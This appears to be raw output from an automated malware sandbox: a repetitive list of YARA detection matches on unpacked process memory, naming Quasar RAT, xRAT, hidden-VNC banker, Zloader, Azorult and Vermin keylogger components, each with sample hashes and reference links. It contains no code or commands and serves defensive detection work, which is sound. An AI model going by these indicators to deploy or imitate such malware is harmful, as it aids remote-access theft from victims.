Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
